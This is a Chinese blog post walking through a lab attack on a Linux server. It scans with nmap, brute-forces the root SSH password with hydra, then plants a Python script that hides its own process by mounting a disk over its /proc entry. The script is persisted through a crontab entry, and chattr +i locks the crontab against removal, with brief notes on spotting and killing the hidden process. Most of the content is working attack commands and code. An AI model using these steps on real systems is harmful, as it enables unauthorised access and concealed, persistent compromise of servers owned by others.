• 02: kali-linux破解密码运行脚本并隐藏进程


    1.1 攻击流程

      1、攻击流程

          参考博客:https://cloud.tencent.com/developer/article/1180906

                            https://blog.csdn.net/Tahir_111/article/details/82389570

          

    1.2 安装Kali-linux用于暴力破解linux密码

      1、借助kali-linux暴力破解linux密码

    root@kali:~# nmap -sP 192.168.56.0/24           # 查询192.168.56.0/24网段中存活的主机
    MAC Address: 00:50:56:FC:8B:AF (VMware)
    Nmap scan report for 192.168.56.11
    
    [root@linux-node4 aaa]# nmap 192.168.56.11      # 查询指定主机开启的服务
    22/tcp   open  ssh
    3031/tcp open  eppc
    8001/tcp open  vcom-tunnel
    
    root@kali:~# hydra -l root  -P passwd.txt -t 1 -vV -e ns 192.168.56.11 ssh  # 暴力破解密码  
    [22][ssh] host: 192.168.56.11   login: root   password: chnsys@2016

      2、远程被控服务器添加病毒脚本

    root@kali:~# ssh root@192.168.56.14      # 通过kali-linux登录 192.168.56.14
    [root@linux-node4 aaa]# vim test.py      # 写一个脚本模拟病毒
    # -*- coding:utf-8 -*-
    # test.py测试脚本
    import os
    import time
    
    while True:
        pid = os.getpid()
        # 当然也可以使用mount -o bind /empty/dir /porc/xxxx
        os.system("mount /dev/sda1 /proc/%s"%str(pid))
        #time.sleep(1) 
    [root@linux-node4 aaa]# nohup python test.py > /dev/null 2>&1 &   # 后台执行python脚本

      3、尝试找到病毒进程

    [root@linux-node4 aaa]# top                               # 发现cpu大量占用但没有找到刻意进程
    [root@linux-node4 aaa]# ps -aux                           # 无可疑进程
    [root@dbserver ~]# ps -aux --sort=-pcpu|head -10          # 按CPU使用比排序降序取前十,找不到可疑进程
    [root@linux-node4 aaa]# mount                             # 发现一个可以挂载
    /dev/sda1 on /proc/100262 type xfs (rw,relatime,attr2,inode64,noquota)
    [root@linux-node4 aaa]# kill -9 100262                    # 杀死这个可以进程CPU就恢复啦

      4、添加定时任务让脚本定时启动

     [root@linux-node1 ~]# vim /etc/crontab
    */1 * * * * root python /aaa/test.py  > /dev/null 2>&1 &
    [root@linux-node4 /]# systemctl restart crond
    [root@linux-node4 /]# mount
    [root@linux-node4 /]# kill -9 8765                       # 发现杀不完,刚杀掉有启动
    [root@linux-node1 ~]# vim /etc/crontab                   # 只能到 /etc/crontab 先删除定时任务在杀
    [root@linux-node4 /]# systemctl restart crond            # 重启服务,否则有时不生效

      5、还可以添加文件锁

    '''chattr文件加锁'''
    [root@linux-node4 /]# chattr +i /etc/crontab                # 给文件加锁
    [root@linux-node4 /]# vim /etc/crontab                      # root用户都无法修改
    rm: cannot remove ‘test.py’: Operation not permitted
    [root@linux-node1 aaa]# chattr -i /etc/crontab              # 解除锁
    [root@linux-node1 aaa]# vim /etc/crontab                    # 发现可以正常修改 /etc/crontab
  • 相关阅读:
    HDOJ 450题留念
    有关VIM的一些笔记
    hdu 2715
    POJ 1004
    链表的创建,添加结点,打印...
    C++ 静态数据成员小谈
    自定义String类
    sizeof/strlen小论
    多态之重载多态运算符重载那些事
    01背包问题
  • 原文地址:https://www.cnblogs.com/xiaonq/p/12423251.html
Copyright © 2020-2023  润新知